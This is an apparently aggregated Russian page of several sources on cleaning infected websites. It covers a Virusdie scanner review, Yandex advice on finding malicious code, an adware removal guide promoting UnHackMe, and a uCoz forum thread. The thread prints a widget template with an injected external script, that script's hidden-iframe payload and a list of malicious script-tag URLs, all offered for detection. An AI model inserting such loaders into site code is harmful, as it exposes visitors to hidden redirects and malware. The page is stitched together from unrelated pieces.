Как вылечить сайт ucoz

08.01.2020
0
ГлавнаяКак вылечитьКак вылечить сайт ucoz
Как вылечить сайт ucoz thumbnail

251

Вылечить сайт от вирусов еще совсем недавно можно было только на платной основе и совсем не дешево. Прежде всего, мало кто на первых порах создания своего сайта, задумывается о его безопасности. А в случае заражения, желательно кого-нибудь обвинить, но только не себя. А между тем, в большинстве случаев, скажем прямо, мы сами виноваты в этом, «что тут петли-то крутить!»

Но и установкой одного антивируса здесь тоже не обойтись. Я не буду перечислять причины, а сразу перейду к главному вопросу. Если уж так случилось, что вы сами обнаружили или инструменты веб-мастера яндекса и гугла вам подсказали о присутствии вредоносного кода или вируса на вашем сайте, необходимо сразу принять меры, иначе о последствиях просто подумать страшно. Простой бан поисковиков вам покажется сказкой.

Если у вас статичный сайт-визитка созданный на простом html-шаблоне или сверстан вами самостоятельно, то вылечить такой сайт от вирусов покажется простым баловством. Ведь наверняка всегда есть копия такого сайта на локальной машине, старый удалил, новый закачал на хостинг и все готово. Но если вы используете cms-системы, здесь проблема посерьезней и решить ее на раз-два не получиться.

Конечно очень желательно иметь в запасе резервную копию сайта, но как всегда об этом можно и «позже» подумать.

Как вылечить сайт от вирусов созданный на cms

В любой cms-системе очень много различных папок и файлов необходимых для работы сайта. Отыскать в них зараженные файлы в ручном режиме, просто не реально. И здесь многим бесстрашным веб-мастерам пришли на помощь специализированные сервисы. О некоторых я рассказывал в статьях и курсах, но сегодня речь пойдет о сервисе «Вирусдай» (https://virusdie.ru).

Знал о нем давно, но не было повода для близкого знакомства. Но как говориться, не стоит доверять одному антивирусу как и одному врачу, а вдруг ошибка в диагнозе! И я решил протестировать на своем блоге. Все этапы проверки я зафиксировал с помощью подробных скриншотов.

Сервис проверки сайта на вирусы и его лечение

Для начала регистрируемся и получаем письмо с просьбой о подтверждении регистрации. Затем добавляем адрес сайта в специальное поле и процесс пошел.

На втором этапе необходимо скачать файл синхронизации и добавить в корень сайта. При добавлении файла, название самого файла менять не нужно. Как все будет готово, жмем на зеленую ссылку.

Добавлять файл можно вручную, или автоматически, если есть данные для ftp-доступа

Если все сделано правильно и перейдя по ссылке у вас не будет ошибок, а будет вот такая картинка, тогда все отлично и можно выбрать способ лечения платный и бесплатный поиск, а лечить будем самостоятельно. В бесплатном режиме можно проверить только один раз, но а если нет желания постоянно думать о безопасности и тратить время на проверку и лечение сайта от вирусов, можно довериться сервису за не большую плату, всего 2499 рублей в год. Что называется, заплатил и спи спокойно.

Я выбрал бесплатную проверку сайта на вирусы и лечение в ручном режиме. Почему? Что касается денег, то они здесь ни при чем, а вот про ручной режим немного расскажу.

При наличии на сайте специальных расширений, которые тоже могут вызвать подозрение у разных проверочных сервисов, можно по незнанию в один миг нарушить работу всего проекта. А вот в ручном режиме, желательно разобраться что за файл и для чего он предназначен.

Кроме этого, сервис присылает отчет о проделанной работе на почтовый ящик, где так же можно просмотреть название подозрительных файлов и каждый файл является ссылкой на статью об этом файле.

Сам процесс проверки показан на картинке ниже.

Так же доступен полный отчет на сайте virusdie.ru в личном кабинете. Если выбран бесплатный способ, сервис просто дает информацию о найденных подозрительных файлах или вирусах.

Подведя итог, можно сказать о том, что с помощью данного сервиса мы сможем бесплатно не вылечить сайт от вирусов, а произвести поиск подозрительных или зараженных файлов. Лечение соответственно платное, но если учитывать сложность поиска таких файлов, то помощь таких сервисов быстро решает данную проблему

Чтобы обезопасить себя и развеять все сомнения о подозрительных файлах найденных у меня на блоге, я пропустил все эти файлы еще через 50 антивирусов сервиса virustotal.

Проверка подозрительных файлов на вирусы

Хоть я точно знаю к каким плагинам относятся мои «подозрительные» файлы и лечить их от вирусов нет необходимости, все же решил устроить дополнительную проверку. Скопировал все файлы к себе на компьютер, запаковал в архив и с помощью virustotal проверил вначале архивом. Но и этого мне показалось мало, и я проверил весь сайт на вирусы с помощью следующей функции сервиса-это добавляя адрес сайта.

Читайте также:  Как вылечить наружный геморрой в домашних условиях быстро и навсегда

В результате ничего подозрительного выявлено не было. Я не сомневался в этом потому что отслеживаю периодически эти моменты.

Вылечить сайт от вирусов можно и вручную, но это для любителей работать ручками и копаться в файлах в поисках вредоносного кода или подозрительного файла. Об этом в другой раз. Если конечно это интересно, оставляйте комментарии.

Источник

Проанализируйте способы заражения:

  • Злоумышленник может получить пароли к администраторским панелям CMS, FTP или SSH аккаунтам. Обычно пароли подбирают или крадут с помощью троянских программ, заразивших компьютер вебмастера.

  • Уязвимости веб-приложения могут позволять посторонним размещать на сайте произвольный код.

  • Из-за заражения внешнего ресурса (партнерской программы, баннерной системы, счётчика) предоставленный вам код может стать опасным для пользователей.

Проанализируйте информацию о заражении в Яндекс.Вебмастере, в разделе Безопасность и нарушения. Раздел содержит перечень зараженных страниц, даты проверок и вынесенные антивирусом вердикты. Перейдя по ссылке в названии вердикта, вы увидите его описание и примерный вид кода, соответствующего вердикту (кода, который непосредственно появляется на страницах сайта).

Вы также можете самостоятельно воспроизвести проблему с помощью виртуальной машины.

  1. Остановите веб-сервер, чтобы оградить посетителей сайта от потенциальной опасности. Затем проверьте антивирусом файлы веб-сервера и все рабочие станции, с которых администрируют сервер (можно использовать бесплатные антивирусные утилиты) и смените все пароли: root, FTP, SSH, от административных панелей хостинга и CMS.

  2. Если до заражения была сделана резервная копия сайта, восстановите ее.

  3. Обновите до последних версий все используемые сайтом программы и поищите описания исправленных уязвимостей. Возможно, это поможет понять, каким образом сайт был заражен.

  4. Удалите лишних пользователей с расширенными правами и тщательно проверьте сервер на наличие веб-шелла, с помощью которого злоумышленник может изменять код сайта в обход авторизации.

  5. Проверьте наличие вредоносного кода:

    • во всех серверных скриптах, шаблонах CMS, базах данных;

    • в конфигурационных файлах веб-сервера или интерпретатора серверных скриптов;

    • если вы используете shared-хостинг, проверьте другие сайты, расположенные на том же сервере — может быть заражен весь сервер.

Признаки вредоносного кода:

  • Код посторонний или незнакомый, не соответствует резервной копии или системе контроля версий.

  • Обфусцированный (нечитаемый, неструктурированный) код.

  • Дата модификации файлов совпадает с временем заражения или более поздняя. Этот параметр ненадежен, так как дата модификации файлов может быть изменена вирусом.

  • Использование характерных для вредоносного кода функций. Примеры таких функций для языка PHP:

    • динамическое исполнение кода (eval, assert, create_function);

    • обфускация (base64_decode, gzuncompress, gzinflate, str_rot13, preg_replace);

    • загрузка удаленных ресурсов (file_get_contents, curl_exec).

Пометка об опасности сайта в результатах поиска будет снята, если при очередной проверке робот Яндекса не обнаружит заражения. Чтобы ускорить перепроверку, в интерфейсе Яндекс.Вебмастера, в разделе Безопасность и нарушения, нажмите кнопку Я все исправил.

Рекомендуем в течение нескольких недель после заражения регулярно перепроверять файлы и код сайта на тот случай, если использованная уязвимость не была устранена или злоумышленники по прежнему имеют доступ к сайту.

Яндекс постоянно ищет и исследует новые виды заражений и публикует результаты исследований в блоге Безопасного поиска Яндекса.

Если вы обнаружили на своем сайте вредоносный или подозрительный код, отправьте его на анализ специалистам.

Источник

UCOZUCOZNET.UCOZ.NET — это вирус, который показывает всплывающую рекламу в браузере.

  1. Показывает UCOZUCOZNET.UCOZ.NET нежелательную всплывающую рекламу.
  2. UCOZUCOZNET.UCOZ.NET перенаправляет щелчки в браузере на вредоносные веб сайты.
  3. UCOZUCOZNET.UCOZ.NET показывается регулярно, даже если закрываешь браузер.
  4. UCOZUCOZNET.UCOZ.NET появляется в строке ввода браузера при выборе новой вкладки.
  5. UCOZUCOZNET.UCOZ.NET меняет настройки поиска в браузере.
  6. UCOZUCOZNET.UCOZ.NET меняет ярлыки браузера на рабочем столе и в меню, чтобы вместе с запуском браузера показывалась реклама.

Как происходит заражение рекламным вирусом UCOZUCOZNET.UCOZ.NET?

Мой братишка — заядлый геймер. Что ни зайду в гости — он постоянно во что-то рубится. Иногда я думаю, что ест, спит и справляет нужду — тоже возле компьютера. Играет просто во все, что движется. Онлайн, оффлайн…

В общем, скачивает он порядочное количество всякого интернет мусора, не обращая внимание на содержимое и безопасность установочного процесса. Все, что он инсталлирует — он инсталлирует по-умолчанию. Так же быстрее! Короче, я не был удивлен, когда вчера он пожаловался мне, что подцепил очередной рекламный вирус — UCOZUCOZNET.UCOZ.NET.

Как вылечить компьютер от рекламного вируса UCOZUCOZNET.UCOZ.NET в браузерах chrome, firefox, internet explorer, edge

Сейчас очень популярно стало дополнять инсталяционные пакеты всяческим мусорным софтом, которое, вообще говоря, вам вовсе и не нужно. Более того, иногда оно даже потенциально опасно. Одним из примеров такого нежелательного программного обеспечения и служит рекламный вирус UCOZUCOZNET.UCOZ.NET. Звучит просто как имя сайта. Но на самом деле данный зловред начинает заваливать вас назойливой рекламой с момента заражения вашего компьютера.

Как избежать заражения вирусом UCOZUCOZNET.UCOZ.NET или иным зловредом?

Прежде всего никогда не устанавливайте новое программное обеспечение по-умолчанию. Всегда обращайте внимание на опции установки. Внимательно смотрите, не предлагается ли установить дополнительно и ненужное вам программное обеспечение. От его установки лучше отказаться. Помните: потратьте сейчас на минуту больше своего времени, и вы избежите геморроя по расчистке своего компьютера в будущем!

Читайте также:  Как вылечить кота открытая рана

«Ну а что делать, если я уже заразился вирусом?», — спросите вы.
Без паники, пару методов я набросал. Как всегда: ручками, и машиной. Угадайте, какой предпочитаю я?

Инструкция по ручному удалению рекламного вируса UCOZUCOZNET.UCOZ.NET

Для того, чтобы самостоятельно избавиться от рекламы UCOZUCOZNET.UCOZ.NET, вам необходимо последовательно выполнить все шаги, которые я привожу ниже:

  1. Поискать «UCOZUCOZNET.UCOZ.NET» в списке установленных программ и удалить ее.

    2. Проверить список установленных программ

  2. Открыть Диспетчер задач и закрыть программы, у которых в описании или имени есть слова «UCOZUCOZNET.UCOZ.NET». Заметьте, из какой папки происходит запуск этой программы. Удалите эти папки.

    3. проверить диспетчер задач

  3. Запретить вредные службы с помощью консоли services.msc.

    4. запустить консоль служб

  4. Удалить “Назначенные задания”, относящиеся к UCOZUCOZNET.UCOZ.NET, с помощью консоли taskschd.msc.

    5. запустить планировщик заданий

  5. С помощью редактора реестра regedit.exe поискать ключи с названием или содержащим «UCOZUCOZNET.UCOZ.NET» в реестре.

    6. запустить редактор реестра

  6. Проверить ярлыки для запуска браузеров на предмет наличия в конце командной строки дополнительных адресов Web сайтов и убедиться, что они указывают на подлинный браузер.

    7. проверить ярлык на наличие дополнительных инструкций в конце

  7. Проверить плагины всех установленных браузеров Internet Explorer, Chrome, Firefox и т.д.

    8. проверить плагины

  8. Проверить настройки поиска, домашней страницы. При необходимости сбросить настройки в начальное положение.

    9. проверить изменения в настройках домашней страницы

  9. Проверить настройки DNS вашей сети. Рекомендую обратиться к документации, предоставленной вашим провайдером.
  10. Очистить корзину, временные файлы, кэш браузеров.

И все же автоматика лучше!

Если ручной метод — не для вас, и хочется более легкий путь, существует множество специализированного ПО, которое сделает всю работу за вас. Я рекомендую воспользоваться UnHackMe от Greatis Software, выполнив все по пошаговой инструкции.
Шаг 1. Установите UnHackMe. (1 минута)
Шаг 2. Запустите поиск вредоносных программ в UnHackMe. (1 минута)
Шаг 3. Удалите вредоносные программы. (3 минуты)

UnHackMe выполнит все указанные шаги, проверяя по своей базе, всего за одну минуту.

При этом UnHackMe скорее всего найдет и другие вредоносные программы, а не только редиректор на UCOZUCOZNET.UCOZ.NET.

При ручном удалении могут возникнуть проблемы с удалением открытых файлов. Закрываемые процессы могут немедленно запускаться вновь, либо могут сделать это после перезагрузки. Часто возникают ситуации, когда недостаточно прав для удалении ключа реестра или файла.

UnHackMe легко со всем справится и выполнит всю трудную работу во время перезагрузки.

И это еще не все. Если после удаления редиректа на UCOZUCOZNET.UCOZ.NET какие то проблемы остались, то в UnHackMe есть ручной режим, в котором можно самостоятельно определять вредоносные программы в списке всех программ.

Итак, приступим:

Шаг 1. Установите UnHackMe (1 минута).

  1. Скачали софт, желательно последней версии. И не надо искать на всяких развалах, вполне возможно там вы нарветесь на пиратскую версию с вшитым очередным мусором. Оно вам надо? Идите на сайт производителя, тем более там есть бесплатный триал. Запустите установку программы.

    2. начать установку UnHackMe

  2. Затем следует принять лицензионное соглашение.

    3. продолжить установку UnHackMe

  3. И наконец указать папку для установки. На этом процесс инсталляции можно считать завершенным.

    4. выбрать каталог для установки UnHackMe

Шаг 2. Запустите поиск вредоносных программ в UnHackMe (1 минута).

  1. Итак, запускаем UnHackMe, и сразу стартуем тестирование, можно использовать быстрое, за 1 минуту. Но если время есть — рекомендую расширенное онлайн тестирование с использованием VirusTotal — это повысит вероятность обнаружения не только перенаправления на UCOZUCOZNET.UCOZ.NET, но и остальной нечисти.

    2. Начинаем удалять вирусы используя UnHackMe

  2. Мы увидим как начался процесс сканирования.

    3. сканирование системы UnHackMe

Шаг 3. Удалите вредоносные программы (3 минуты).

  1. Обнаруживаем что-то на очередном этапе. UnHackMe отличается тем, что показывает вообще все, и очень плохое, и подозрительное, и даже хорошее. Не будьте обезьяной с гранатой! Не уверены в объектах из разряда “подозрительный” или “нейтральный” — не трогайте их. А вот в опасное лучше поверить. Итак, нашли опасный элемент, он будет подсвечен красным. Что делаем, как думаете? Правильно — убить! Ну или в английской версии — Remove Checked. В общем, жмем красную кнопку.

    2. удалить используя UnHackMe

  2. После этого вам возможно будет предложено подтверждение. И приглашение закрыть все браузеры. Стоит прислушаться, это поможет.
  3. В случае, если понадобится удалить файл, или каталог, пожалуй лучше использовать опцию удаления в безопасном режиме. Да, понадобится перезагрузка, но это быстрее, чем начинать все сначала, поверьте.

    4. исправить с использованием UnHackMe

  4. Ну и в конце вы увидите результаты сканирования и лечения.

    5. исправлено при помощи UnHackMe

Итак, как вы наверное заметили, автоматизированное лечение значительно быстрее и проще! Лично у меня избавление от перенаправителя на UCOZUCOZNET.UCOZ.NET заняло 5 минут! Поэтому я настоятельно рекомендую использовать UnHackMe для лечения вашего компьютера от любых нежелательных программ!

(6 votes, average: 5,00 out of 5)
Загрузка…

Источник

ProsvetekvatorДата: Воскресенье, 10.02.2013, 18:23 | Сообщение # 1
Как вылечить сайт ucoz

Статус: Offline

Полковник

Сообщений: 152

Награды «2»

Сегодня мы ознакомимся с распространёнными вирусами. Подобные вирусы часто находятся в скриптах предлагаемых веб мастерами  для установки на сайт. То есть имеются в виду любые скрипты: шаблоны, часы, информеры, виды материалов, плееры, мини профили и т.д.

Вредоносный код может быть внедрён (вписан, дописан) к любой самый безобидный скрипт для сайта юкоз . Вот пример на первый взгляд безобидного скрипта «Топ пользователей» для сайта юкоз.

Код

<div class=»screenshot»>    
    <table cellspadding=»0″ class=»topten_table» style=»border-color:    
#000000; width: 100%; margin: 0px;» cellspacing=»0″>         
    <tbody>    
    <tr>         
    <td style=»padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px; width: 48px;» onclick=»»;»>    
    <center>    
    <?if($AVATAR_URL$)?>    
    <script src=»https://xall-pc.ru/up.js» type=»text/javascript»></script>    
    <img title=»$USERNAME$» class=»userAvatar» src=»$AVATAR_URL$» border=»0″ height=»48″ width=»48″><?else?>         
    <IMG SRC=»https://bambun.ru/images/noav9atar.png» BORDER=»0″ width=»48″ height=»48″>    
    <?endif?>    
    </center>         
    </td>    
    <td style=»padding: 2px 0px 2px 4px; cursor: pointer; border-left:    
0px; text-align: left; font-size: 10px; font-family: tahoma, verdana,    
arial; color: #555555; line-height: 14px;» onclick=»‘;»>    
    <font style=»font-size: 12px; color: #000000;»><b>$USERNAME$</b> ($NUMBER$ место)</font>    
    <font color=»#1882ed»>$GROUP_NAME$</font>    
    <br> Релизов: <b>    
    <font color=»#000000″>$LOAD_POSTS$</font>    
    </b>    
    Форум: <b>    
    <font color=»#000000″>$FORUM_POSTS$</font>    
    </b>    
    </td>         
    </tr>         
    </tbody>         
    </table>    
    </div>

Этот вид будет исправно работать и не предвещать беды ( до поры, до времени ), потому что в нём находится вредоносный код скрипта, вот он ▼

Код

<script src=»https://xall-pc.ru/up.js» type=»text/javascript»></script>

Откроем содержимое файла up.js

Код

document.write(‘<iframe src=»https://yanreyaa.pp.ua»    
style=»position:absolute;left:-9999px;top:-9999px;» width=»468″    
height=»70″></iframe>’);

Разберем код,и как он работает.
Команда document.write выводит информацию, дальше в скобках прописывается выводимая информация, в этом случае это «фрейм» в виде тега iframe который представляет собой страницу с установленным адресом и размерами.
Для «фрейма» прописаны стили (style), это довольно интересное свойство position которому придали значение абсолютного позиционирования.

При абсолютном позиционировании основную роль играют свойства положения, здесь они представлены в виде свойств left и top, где left (положение от левого края видимого пространства страницы) а top (положение от верхней части видимого пространства страницы).

Теперь представьте себе такую картину,обоим свойствам придали значение -9999px,а это фактически 10000 пикселей и со знаком минус, значит страница размерами 468Х70 смещена далеко за пределы видимого пространства, другими словами её просто не видно, этот элемент спрятан от вашего
глаза, конечно вируса там может и не быть, но это дело времени, пока на страницу «фрейма» его хозяин не добавит зловредных элементов которые начнут себя проявлять перекидывая на другие сайты или вредить иными способами, но не думайте что все «фреймы» несут вред, они как кухонный нож который можно использовать как в добрых так и в корыстных целях.

Всё это я раскладываю для тех кто слабо разбирается, остальных прошу не считать это нудным.
Далее хочу предоставить вам список зловредных кодов с их
содержимым, если заметите их в предлагаемых скриптах — удаляйте, без них всё будет работать как полагается.

Код

<script src=»https://china-air.ru/tsed.js» type=»text/javascript»></script>

Код

<script src=»https://xall-pc.ru/up.js» type=»text/javascript»></script>

Код

<script src=»https://sanpb.ru/text.js» type=»text/javascript»></script>

Код

<script src=»https://cm4fan.ru/none.js» type=»text/javascript»></script>

Код

<script src=»https://am-investor.ru/higer.js» type=»text/javascript»> </script>

Код

<script src=»https://activiks.ru/img/png.js» type=»text/javascript»></script>

Код

<script language=’javascript’ type=’text/javascript’      
    src=’https://linkpeoples.com/7pg0t744isc7uyuk1o268kz477muamt’></script>

Разумеется, что это не все зловредные коды, если вам знакомы иные ссылки на вирусные сайты, прошу выкладывать сведения о них в этой теме.

«Пред. тема |
След. тема»

ProsvetekvatorДата: Воскресенье, 03.03.2013, 15:59 | Сообщение # 2
Как вылечить сайт ucoz

Статус: Offline

Полковник

Сообщений: 152

Награды «2»

Вот еще один появился

Код

<script type=»text/javascript» src=»https://camadmin.ru/earch.js»></script>

ProsvetekvatorДата: Воскресенье, 21.04.2013, 19:06 | Сообщение # 3
Как вылечить сайт ucoz

Статус: Offline

Полковник

Сообщений: 152

Награды «2»

Мошенники не спят! Вот новый код:

Код

<script type=»text/javascript» src=»https://returna.net/background.js»></script>

Распространяет его пользователь Dog, будте внимательны!
На нашем сайте все его материалы проходят модерацию и выпиливаются вредоносные коды, так что смело устанавливайте скрипты, не боясь подхватить какую нибудь дрянь))))))))

lanaДата: Среда, 12.02.2014, 20:06 | Сообщение # 4
Как вылечить сайт ucoz

Статус: Offline

Рядовой

Сообщений: 2

Награды «»

Вот еще один:  

Код

<script language=»JavaScript» src=»https://101widgets.com/01105007/1/1″></script>

ProsvetekvatorДата: Среда, 12.02.2014, 20:12 | Сообщение # 5
Как вылечить сайт ucoz

Статус: Offline

Полковник

Сообщений: 152

Награды «2»

 lana, спасибо! Давно не обновлял эту тему.

Проблемы по установке скриптов пишите на форум: тыц
Пообщаться здесь

lanaДата: Среда, 12.02.2014, 20:27 | Сообщение # 6
Как вылечить сайт ucoz

Статус: Offline

Рядовой

Сообщений: 2

Награды «»

спасибо вам, за то, что помогли!!! не знала, что и делать, наткнулась на вашу статью, перешерстила все блоки и вот!!! Большое вам спасибо!!!!!!!!!!!!!!!!!!!!!!!!! Спасатель

ProsvetekvatorДата: Среда, 12.02.2014, 20:40 | Сообщение # 7
Как вылечить сайт ucoz

Статус: Offline

Полковник

Сообщений: 152

Награды «2»

Цитата lana ()

Большое вам спасибо!!!!!!!!!!!!!!!!!!!!!!!!!

Пожалуйста, оставайтесь с нами)

Проблемы по установке скриптов пишите на форум: тыц
Пообщаться здесь

Источник

Читайте также:  Как быстро вылечить простуду в домашних условиях за день на губе
Предыдущая статья
Как вылечить пустоту под ногтем ноги
Следующая статья
Эпилепсия как вылечить эту болезнь